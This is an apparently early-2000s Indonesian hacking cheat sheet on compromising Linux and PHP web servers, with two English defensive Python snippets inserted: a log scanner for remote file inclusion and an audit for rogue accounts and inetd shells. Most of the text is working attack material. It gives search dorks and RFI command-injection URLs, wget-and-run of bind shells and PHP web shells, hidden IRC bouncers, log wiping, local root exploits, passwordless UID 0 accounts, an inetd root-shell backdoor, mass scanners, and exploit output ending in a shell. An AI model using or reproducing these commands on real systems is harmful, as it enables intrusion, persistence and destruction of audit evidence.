= echo “zone “i-am.Cmaster4.net” IN {” > named.conf
= echo “type master; > named.conf
= echo “file “/var/named/named.local”;” > named.conf
= echo “allow-update { none; };” > named.conf
= echo “};” >> named.conf
= after that, restart named and httpd
= /etc/init.d/named stop
= /etc/init.d/named start
= /etc/init.d/httpd stop
= /etc/init.d/httpd start
= or
= /etc/rc.d/init.d/named stop
= /etc/rc.d/init.d/named start
= /etc/rc.d/init.d/httpd stop
= /etc/rc.d/init.d/httpd start
= or, if they are not in /etc/init.d/, run find |grep named and then find |grep httpd
=================================================================
wget http://www.geocities.com/lifron/Pre-psyBNC.tgz; tar -zxvf Pre-psyBNC.tgz; cd psybnc; make; wget http://www.geocities.com/lifron/psybnc.conf.6669.txt; mv psybnc.conf.6669.txt .sh; wget http://www.geocities.com/lifron/kik; chmod +x kik; ./kik “/usr/sbin/httpd -DHAVE_PROXY -DHAVE” ./psybnc .sh; cd ..; rm -rf Pre-psyBNC.tgz
====================
EGGDROP
====================
= wget www.geocities.com/lifron/eggdrop.tar.gz; tar -zxvf eggdrop.tar.gz; cd eggdrop; wget www.geocities.com/lifron/bot.conf; cd scripts; wget www.geocities.com/lifron/netgate.tcl; cd ..
= ./eggdrop -mnt bot.conf
./eggdrop -m bot.conf
==============
My_eGallery from K-159
==============
1.pasangin bindtty
2. kalo ggk jalan bindtty nya pasangin shell.php
3.kalo ggk jalan juga coba cgi-telnet
contohnya
http://livron.port5.com/mail.php <———ini source shell misalnya: http://www.moonshade.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=wget%20http://livron.port5.com/mail.php kalo gak bisa kita cari folder yg bisa buat id wwrun utk wget kalo bisa… buka: http://www.target.org/modules/My_eGallery/public/mail.php ======== pasang bindtty wget www.geocities.com/lifron/bindtty -O /tmp/httpd ini biar hasil wgetnya di taro di folder /tmp dg nama file httpd baru bikin file exekusi chmod 755 /tmp/httpd ============ cgi-telnet mencari folder cgi-binnya >> disitulah kita Taro cgi-telnetnya
biasanya folder cgi-bin ada di folder …/www
tp kebanyakan webserver
tiap user di beri folder cgi-bin masing2
contoh:
/home/users/russisk/html/modules/My_eGallery/public <——td kan kita ada di folder ini http://www.russisk.org/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=ls%20-al%20/home/users/russisk kliatan cgi-bin-nya cd ke folder cgi-bin baru wget ke situ Contoh: wget http://livron.port5.com/kuntua.pl -O /home/users/russisk/cgi-bin/cgi.pl kalo bisa lanjut ke chmod 755 /home/users/russisk/cgi-bin/cgi.pl <——-agar file cgi.pl nya jd file eksekusi kalo bisa tinggal buka: www.target.org/cgi-bin/cgi.pl port 7788 ============ end wget www.geocities.com/lifron/psy.tar.gz; tar -zvxf psy.tar.gz cd .psy ./config KuNTuA 6669 ./fuck ./run =========== Tittle : SUPER KIDDIES HACKING: “PHP SUPER BUGS” Author : K-159 Greetz : Lieur-Euy, Red_Face, Itsme-, yudhax, pe_es, bithedz, KuNtuA, Baylaw, Minangcrew, Chanel : #bandunghacker, #indohackinglink, #hackercrew, #batamhacker, #aikmel Email : eufrato@linuxmail.org Reference : security-corporations.com, security-focus.com, bugs-traq, google.com ——————————————————————————————————– Prolog : i wrote this tutorial just for my dearest brother “Lieur-Euy” thx for all the best friendship, spirit, motivation, kindness, joke, and all the time that we spend together. just wait, till i finished my homework. ‘n we will rock the world again 1. allinurl filename bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?filename=*”. keyword ‘*.php’ bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?filename=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “ kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 2. 
allinurl content bugs content ini targetnya dapat kita cari dengan keyword “allinurl:*.php?content=”. keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?content=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: ” http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “ kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 3. allinurl page bugs page ini targetnya dapat kita cari dengan keyword “allinurl:*.php?page=*”. ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?page=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 4. allinurl link bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?link=*”. keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?link=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 5.allinurl file bugs file ini targetnya dapat kita cari dengan keyword “allinurl:*.php?file=*”. ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?file=*”. 
Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. Setelah mendapatkan target yang vulnerable ada beberapa hal yang bisa kita lakukan : I. install bindtty telnet 1.buat url seperti ini: ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd “ url diatas untuk melakukan wget bindtty telnet ke server target dan hasil wget nya di taruh di folder /tmp dg nama file httpd. 2.lalu ubah file httpd yg berada di folder /tmp tadi jadi file eksekusi: ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /tmp/httpd “ 3.eksekusi file httpd tadi : ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=/tmp/httpd “ 4. buka telnet ke IP target sesuai dg port bindttynya II. install Cgi-telnet 1.buat url seperti ini : ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl “ url diatas untuk melakukan wget cgi-telnet test.pl ke server target dan hasil wget disimpan di folder /var/www/cgi-bin dg nama file test.pl. sesuaikan dengan letak folder cgi-bin didalam server tersebut untuk menyimpan hasil wget cgi-telnetnya. 2. buat cgi-telnet test.pl jadi file eksekusi : ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /var/www/cgi-bin/test.pl “ 3. akses cgitelnet kita dengan membuka url : ” http://www.target.com/cgi-bin/test.pl “ masukkan passwordnya “n0fr13″ III. install shell php 1. 
buat url seperti ini : “http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://emilroni.port5.com/mail.php -O log.php “ url diatas utk melakukan wget ke server target dan hasil wget berupa file log.php. bila keluar pesan “permission denied” cari lah folder lain yang bisa untuk wget shell.php kita. 2. akses shell php kita sesuai dengan foldernya : ” http://www.target.com/target/log.php “ IV. Deface http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=echo “K-159 and crew was touch your system” > test.html
thats all my friends. just try it !!!
Denpasar, 15 january 2004
K-159
Epilog :special thx to my beloved sister “May” for all the spirit, motivations, love, kindness, and all the fire that u give to me.”I love U my dear sister, in the name of Allah”.
bacaan lebih lanjut:
——————–
www.geocities.com/emilroni/hackurl.txt
www.geocities.com/emilroni/google.txt
=======================
=========================================================================================
Title :SUPER KIDDIES HACKING “Super Bugs PHP II”
Author :K-159
Greetz :KuNTuA, Lieur-Euy, pe_es.
Reference :google.com, membres.lycos.fr, security-corporations.com, security-challenge.com
==========================================================================================
Proof of Concept :
==================
An error in URL handling in the fopen() function, so that an attacker can inject a script into the target server.
Target :
========
Temukan target nya di google dengan keyword:
1.allinurl:*.php?page=*
2.allinurl:*.php?content=*
3.allinurl:*.php?file=*
4.allinurl:*.php?filename=*
5.allinurl:*.php?link=*
6.allinurl:*.php?view=*
7.allinurl:*.php?sec=*
8.allinurl:*.php?document=*
9.allinurl:*.php?p=*
10.allinurl:*.php?x=*
Exploit:
==========================================================================================
1.http://www.target.com/target.php?page=http://www.geocities.com/inul_asoy/page.txt
2.http://www.target.com/target.php?content=http://www.geocities.com/inul_asoy/content.txt
3.http://www.target.com/target.php?file=http://www.geocities.com/inul_asoy/file.txt
4.http://www.target.com/target.php?filename=http://www.geocities.com/inul_asoy/filename.txt
5.http://www.target.com/target.php?link=http://www.geocities.com/inul_asoy/link.txt
6.http://www.target.com/target.php?view=http://www.geocities.com/inul_asoy/view.txt
7.http://www.target.com/target.php?sec=http://www.geocities.com/inul_asoy/sec.txt
8.http://www.target.com/target.php?documet=http://www.geocities.com/inul_asoy/_document_._txt
9.http://www.target.com/target.php?p=http://www.geocities.com/inul_asoy/p.txt
10.http://www.target.com/target.php?x=http://www.geocities.com/inul_asoy/x.txt
Details Exploit:
==========================================================================================
Upload a file : upload a file to the target server
Explore with fopen() function : look for code that uses fopen on the target server
Execute arbitrary PHP functions : create PHP scripts on the target server
Execute a system() command : run unix/linux commands on the target server
Manager for SQL Server : change the settings of the target's SQL server database
System overviewer (get the root !) : inspect the target server's system and perform a local root
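Seen from the server side, every request in the two tutorials above has the same shape: a query parameter whose value is itself a remote URL, often followed by a cmd= parameter. The following is an added example (not part of the original tutorial) that finds that shape in web server access logs; the log lines, client addresses and the files.example.invalid host are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Common/combined log format: host ident user [time] "request" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3})')
# A value that *starts* with a remote scheme is what include()/fopen() would fetch.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Parameter names that appear on this page; other names are still reported.
PAGE_PARAMS = {"page", "content", "file", "filename", "link", "view",
               "sec", "document", "p", "x", "basepath"}

# Constructed sample log (documentation address ranges, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jan/2004:10:00:01 +0700] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '198.51.100.7 - - [15/Jan/2004:10:02:11 +0700] "GET /index.php?filename=http://files.example.invalid/injex.txt?&cmd=ls -al;id HTTP/1.0" 200 812',
    '198.51.100.7 - - [15/Jan/2004:10:02:40 +0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Ffiles.example.invalid%2Fsuntik.txt%3F&cmd=id HTTP/1.1" 200 300',
    '203.0.113.5 - - [15/Jan/2004:10:05:02 +0700] "GET /view.php?x=http%253A%252F%252Ffiles.example.invalid%252Fx.txt HTTP/1.1" 404 210',
    '192.0.2.44 - - [15/Jan/2004:10:06:30 +0700] "GET /search.php?q=what+is+http://+used+for HTTP/1.1" 200 900',
]


def split_request(request):
    """Return (method, target). Old logs may hold raw spaces inside the URL,
    so the target is everything between the method and the trailing HTTP/x.y."""
    parts = request.split(" ")
    if len(parts) < 2:
        return None
    if parts[-1].upper().startswith("HTTP/"):
        return parts[0], " ".join(parts[1:-1])
    return parts[0], " ".join(parts[1:])


def fully_unquote(value, rounds=3):
    """Undo repeated percent-encoding (http%253A%252F%252F...)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_attempts(lines):
    """Return one record per query parameter whose value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, when, request, status = m.groups()
        parsed = split_request(request)
        if parsed is None or "?" not in parsed[1]:
            continue
        path, query = parsed[1].split("?", 1)
        # Split into pairs first, decode further afterwards, so an encoded
        # '&' inside a value cannot create extra parameters.
        pairs = parse_qsl(query, keep_blank_values=True)
        has_cmd = any(name.lower() == "cmd" for name, _ in pairs)
        for name, value in pairs:
            remote = fully_unquote(value).strip()
            if REMOTE_RE.match(remote):
                hits.append({
                    "client": client, "time": when, "path": path,
                    "param": name, "remote": remote, "status": int(status),
                    "has_cmd": has_cmd,
                    "known_param": name.lower() in PAGE_PARAMS,
                })
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit["client"], hit["status"], hit["path"], hit["param"],
              "->", hit["remote"], "cmd" if hit["has_cmd"] else "")
```

A hit with status 200 and has_cmd set deserves a look at the files that script can write to. The fix itself is in the application and PHP configuration: never pass a request parameter to include() or fopen(), and set allow_url_include (and, where remote fetches are not needed, allow_url_fopen) to Off in php.ini.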
TRIK MEMBUAT PSYBNC : =================================================== unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ; cd var/tmp/;
mkdir …. ; cd …. ; wget http://www.geocities.com/lifron/Pre-psyBNC.tgz;
mv Pre-psyBNC.tgz .sh ; tar -zxvf .sh ; rm .sh ; mv psybnc .log ;
cd .log ; make; mv psybnc “bash ” ; rm psybnc.conf ; wget http://www.geocities.com/lifron/psybnc.conf.20075.txt;
mv psybnc.conf.20075.txt psybnc.txt ; mv psybnc.txt ” ” ; pwd ; PATH=$PATH:/var/tmp/…./.log/;
“bash ” ” “mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud ;
find |grep psybnc
===================================================
: TRIK MENGHAPUS LOG :
=================================================== echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
rm -f /.bash_history /root/.bash_history /var/tmp/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
=================================================== rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
===================================================
: LOCAL ROOT MANDRAKE :
=================================================== unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd /tmp ; mkdir ” ” ; cd ” ”
1. wget www.geocities.com/lifron/local.tar.gz
2. tar -zxvf local.tar.gz
3. cd local
4. ./lconfex -p
5. ./lconfex -f
6. ./handy.sh 0xbffff625 0xbffff5f1
7.mkdir segfault.eng ; touch segfault.eng/segfault.eng
8. ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
9. id
10. root
11. /usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /home/.kuntua
12. echo “tondano::0:0::/.tondano:/bin/bash” >> /etc/passwd
passwd -d kuntua
Changing password for user kuntua
Removing password for user kuntua
passwd: Success
13. Login ke shell terus bersihkan log dan pasang backdoor
14.last |grep kuntua
15. su tondano
16. wget http//www.geocities.com/lifron/remove.c
17. gcc -o r remove.c -DGENERIC
18. ./remove /home/kuntus
19. wget www.geocities.com/lifron/shv4.tar.gz
20. tar -zxvf shv4.tar.gz
21. cd shv4
22. ./setup pass port, misal ./setup gohanz 7788
23. /usr/sbin/userdel -r kuntua
24. cd /var/tmp/” ” <== Bersihkan semua tools 25. Test shell dengan port 7788, login as : root, password : gohanz =================================================== find index.html whereis index.html locate index.html default : cd /var/www/html echo “KuNTuA ToNDaNo Was Here” > index.html
=================================================== cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo “KuNTuA ToNDaNo Was Here” > mnc.html
untuk mentesnya :
http://IP-yg-kamu-hack/~apache
===================================================
BIKIN BACKDOOR
=================================================== echo “kuntua 1979/tcp” >> /etc/services
echo “dial stream tcp nowait root /bin/sh sh -i” >> /etc/inetd.conf kill -HUP 135
telnet dengan port “1979″
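The account, log-wiping and inetd steps above all leave artifacts an administrator can check for: a second UID 0 entry, an empty password field, a login account whose home is a hidden directory, an inetd service that starts a shell, and a history file linked to /dev/null. The following is an added example (not part of the original page) that audits for those markers; the sample files are constructed, except that the "tondano" passwd line and the "dial" inetd line are the ones this page appends.

```python
import os

SHELL_NAMES = {"sh", "bash", "ksh", "csh", "tcsh"}

# Constructed sample files for an offline run.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
alice:x:500:500:Alice:/home/alice:/bin/bash
kuntua:x:501:10::/etc/.kuntua:/bin/bash
tondano::0:0::/.tondano:/bin/bash
bash:x:0:0::/:/bin/bash
"""
SAMPLE_SHADOW = """\
root:$1$constructed$notarealhash:12000:0:99999:7:::
alice:!!:12000:0:99999:7:::
kuntua::12430:0:99999:7:::
"""
SAMPLE_INETD = """\
# constructed inetd.conf
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
dial stream tcp nowait root /bin/sh sh -i
"""


def _records(text):
    """Yield non-empty, non-comment lines."""
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            yield line


def audit_passwd(text):
    """Flag extra UID 0 accounts, empty passwords and hidden home directories."""
    findings = []
    for line in _records(text):
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], "malformed passwd entry"))
            continue
        name, pw, uid, _gid, _gecos, home, shell = fields
        if uid == "0" and name != "root":
            findings.append((name, "UID 0 but not root"))
        if pw == "":
            findings.append((name, "empty password field in passwd"))
        hidden = any(part.startswith(".") for part in home.split("/") if part)
        if hidden and os.path.basename(shell) in SHELL_NAMES:
            findings.append((name, "login shell with hidden home " + home))
    return findings


def audit_shadow(text):
    """An empty second field is what 'passwd -d' leaves behind."""
    findings = []
    for line in _records(text):
        fields = line.split(":")
        if len(fields) > 1 and fields[1] == "":
            findings.append((fields[0], "no password set in shadow"))
    return findings


def audit_inetd(text):
    """Flag inetd services whose server program is a shell."""
    findings = []
    for line in _records(text):
        f = line.split()
        if len(f) < 6:
            continue
        service, user, server = f[0], f[4], f[5]
        # Behind a tcpd wrapper the real program is the first argument.
        if os.path.basename(server) == "tcpd" and len(f) > 6:
            server = f[6]
        if os.path.basename(server) in SHELL_NAMES:
            findings.append((service, "inetd runs %s as %s" % (server, user)))
    return findings


def audit_history(root="/"):
    """Flag root history files that are symlinks to /dev/null."""
    findings = []
    for rel in (".bash_history", "root/.bash_history"):
        path = os.path.join(root, rel)
        if os.path.islink(path) and os.readlink(path) == "/dev/null":
            findings.append((rel, "shell history symlinked to /dev/null"))
    return findings


if __name__ == "__main__":
    for who, why in (audit_passwd(SAMPLE_PASSWD) + audit_shadow(SAMPLE_SHADOW)
                     + audit_inetd(SAMPLE_INETD) + audit_history("/")):
        print("%-10s %s" % (who, why))
```

On a live host, pass the contents of /etc/passwd, /etc/shadow and /etc/inetd.conf to the same functions. Truncated or freshly recreated wtmp, lastlog and messages files are a further sign that cannot be judged from one snapshot, which is the reason to ship logs to a separate host.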
=================================================== http://www.rocketpunch-ent.com/masslpd.tar
http://www.rocketpunch-ent.com/bindscan.c
http://www.rocketpunch-ent.com/lucstatdx.c
=================================================== [root@gila /]#rpm -qa | grep samba
samba-client-2.0.7-36
samba-2.0.7-36
samba-common-2.0.7-36
[root@gila /]# arp -n
Address HWtype HWaddress Flags Mask Iface
192.168.0.6 ether 00:08:C7:C2:0F:1B C eth1
192.168.0.4 ether 00:80:5F:0E:B7:28 C eth1
192.168.0.5 ether 00:00:B4:3C:AC:41 C eth1
192.168.0.2 ether 00:C0:4F:94:CC:70 C eth1
192.168.0.3 ether 00:10:5A:71:17:E3 C eth1
192.168.0.1 ether 00:00:21:28:8C:47 C eth1
[root@gila /]# nmblookup -d2 ‘*’ #untuk mendeteksi netbios
Got a positive name query response from 192.168.0.2 ( 192.168.0.2 )
Got a positive name query response from 192.168.0.4 ( 192.168.0.4 )
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Got a positive name query response from 192.168.0.3 ( 192.168.0.3 )
Got a positive name query response from 192.168.0.1 ( 192.168.0.1 )
[root@gila /]# locate findsmb
/usr/bin/findsmb
[root@router /]# findsmb
IP ADDR NETBIOS NAME WORKGROUP/OS/VERSION
—————————————–
192.168.0.1 CYBER1 [CYBER]
192.168.0.2 CYBER2 [CYBER]
192.168.0.3 CYBER3 [CYBER]
192.168.0.4 CYBER4 [CYBER]
192.168.0.5 CYBER5 [CYBER]
[root@gila /]# mkdir /mnt/samba
[root@gila /]# smbclient -L CYBER5
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Password:
Sharename Type Comment
——— —- ——-
A Disk
C Disk
D Disk
E Disk
IPC$ IPC Remote Inter Process Communication
[root@gila /]# smbmount //cyber5/d /mnt/samba/
Password:
[root@gila /]#
[root@gila /]# cd /mnt/samba/
[root@router samba]# ls
ffastun.ffa ffastun.ffo install RECYCLED
ffastun0.ffx ffastun.ffl film win98
[root@gila samba]# cd film/
[root@gila film]# ls
Amy_Lindsay_Forbidden_Sins_01[1].mpeg
=================================================== bash# tar -zxvf grabbb-0.1.0.tar.gz
bash# cd grabbb
bash# gcc -o grabbb grabbb.c
bash# ./grabbb -a 210.10.19.1 -b 210.100.50.1 23
=================================================== gcc sco-pop.c -o sco-pop
./sco-pop www.target.com
/var/adm
=================================================== : BERSIHKAN LOG :
=================================================== ctlog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/ctlog
messages -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/messages
sulog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/sulog
syslog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/syslog
utmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmp
utmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmpx
wtmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmp
wtmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmpx
=================================================== 1. wget www.geocities.com/lifron/openssl.tar.gz
2. tar -zxvf openssl.tar.gz
3. ./ssl IP
./ssl 204.145.119.253
=================================================== 1. wget www.geocities.com/lifron/massapache.tar.gz
2. tar -zxvf massapache.tar.gz
3. cd massapache
4. ./massossl 211 443 10
=================================================== 1. wget http://www.geocities.com/lifron/openssl-too-open.tar.gz
2. tar -zxvf openssl-too-open.tar.gz
3. cd openssl-too-open
4. ./openssl-too-open
./openssl-too-open -a 0×15 -v 212.70.224.129
=================================================== 1. wget www.geocities.com/lifron/shv4.tar.gz
2. tar xzf shv4.tar.gz
3. cd shv4
4. ./setup port passwd
./setup 7788 35b4tu
================================================ 1. wget http://www.geocities.com/lifron/massplor.tar.gz
2. tar -zxvf massplor.tar.gz
3. cd massplo
4. ./massplo IP -d 8
./massplo 210.10 -d 8
================================================ 1. wgetwww.geocities.com/lifron/mapache2x.gz
2. tar -zxvf mapache2x.gz
3. cd slamet
4. ./apache 208.134.131.49
./massossl 80 443 13
./mapache 443 210.10
================================================ 1. wget http://phaty.org/ptrace-kmod.c.txt
2. mv ptrace-kmod.c.txt ptrace-kmod.c
3. gcc -o ptrace-kmod ptrace-kmod.c
4. ./ptrace-kmod
================================================ 1. wget http://netric.org/exploit/sambal.c
2. gcc -o sambal sambal.c
3. ./sambal -d 0 -C 60 -S IP <== scanning ./sambal -d 0 -C 60 -S IP | grep samba ./sambal -b 0 -v IP <=== attack ================================================ SecureCRT: http://www.vandyke.com/ TTSSH: http://www.zip.com.au/~roca/ttssh.html PuTTY: http://www.chiark.greenend.org.uk/~sgtatham/putty.html SecureShell: http://public.srce.hr/~cigaly/ssh/ ================================================ DEFACE ================================================ find index.html whereis index.html locate index.html default : cd /var/www/html echo “KuNTuA Was Here” > index.html
================================================ cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo “KuNTuA Was Here” > mnc.html
untuk mentesnya :
http://IP-yg-kamu-hack/~apache
================================================ Install WGET
================================================ 1. run: cat /etc/issue to see which operating system is installed
2. run: ftp ftp.rpmfind.net
3. login : anonymous
4. cd linux/redhat/updates/7.0/en/os/
5. cd i386
6. get wget-1.8.2-4.70.i386.rpm
7. quit ftp
8. Installation
rpm -ivh wget-1.8.2-4.70.i386.rpm
http://www.rpmfind.net/linux/rpm2html/search.php?query=wget&submit=Search+…&system=redhat&arch=
=================================================================================================
wget http://202.158.16.157/ssh.diff
wget http://www.geocities.com/lifron/openssh-3.4p1.tar.gz
tar -zxvf openssh-3.5p1.tar.gz
cp ssh.diff openssh-3.5p1.tar.gz
cd openssh-3.5p1
patch -p < ssh.diff ./configure make ssh ./ssh -l root ./ssh -l root 66.136.37.101 ./ssh -l root 66.149.178.214 ================================================ : COMMAND ADDUSER : ================================================ /usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/kuntua /usr/sbin/useradd tondano -u 0 -d / passwd -d kuntua Changing password for user kuntua Removing password for user kuntua passwd: Success passwd -d tondano Changing password for user tondano Removing password for user tondano passwd: Success ================================================ passwd kuntua New UNIX password: kuntua75 Retype new UNIX password: kuntua75 Changing password for user kuntua passwd: all authentication tokens updated successfully password tondano New UNIX password: kuntua75 Retype new UNIX password: kuntua75 Changing password for user tondano passwd: all authentication tokens updated successfully ================================================ ================================================ OPENSSL-TOO-OPEN ================================================ ./openssl -a 0×15 -v 61.220.53.91 : openssl-too-open : OpenSSL remote exploit by Solar Eclipse : Opening 30 connections Establishing SSL connections -> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
: Using the OpenSSL info leak to retrieve the addresses
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl0 : 0×80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl1 : 0×80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl2 : 0×80e1638
: Sending shellcode
-> send_client_hello
-> get_server_hello
ciphers: 0×80e1638 start_addr: 0×80e1578 SHELLCODE_OFS: 208
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_error
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell…
bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a;id
bash-2.05$ Linux Mandrake release 8.0 (Traktopel) for i586
bash-2.05$ Linux proxy2.rayongwit.net 2.4.3-20mdk #1 Sun Apr 15 23:03:10 CEST 2001 i686 unknown
bash-2.05$ uid=48(apache) gid=48(apache) groups=48(apache)
================================================ : MARI KITA MAINKAN ROOTNYA :
================================================ unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0
cd /tmp ; mkdir … ; cd ….
wget www.geocities.com/lifron/local.tar.gz
tar -zxvf local.tar.gz
cd local
./lconfex -p
./lconfex -f
./handy.sh 0xbffff625 0xbffff5f1
GOT IT! Your magic number is : 792
Now create a dir ’segfault.eng’ and touch a file named ’segfault.eng’ in it.
Then exec “./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792″ to get rootshell
*hint* : try play with -b if not succeed. [ n = 0..4 ]
ie : ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792 -b 1
Good Luck d0inks!
mkdir segfault.eng; touch segfault.eng/segfault.eng
./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
id
uid=0(root) gid=48(apache) groups=48(apache)
================================================ /usr/sbin/useradd mails -g wheel -s /bin/bash -d /home/mails
echo “apache::0:0::/mails:/bin/bash” >> /etc/passwd
passwd -d mails
Changing password for user mails
Removing password for user mails
passwd: Success
login ke shell
last | grep mails
su apache
mkdir /var/tmp/” ”
cd /var/tmp/” ”
wget http.phaty.org/remove.c.txt ; mv remove.c.txt remove.c
gcc -o r remove.c -DGENERIC
./remove /home/mails
wget www.radikal.org/backdoor.tar.gz
tar xzf backdoor.tar.gz
./setup 35b4tud1n91n 7788
/usr/sbin/userdel -r mails
/usr/sbin/userdel -r apache
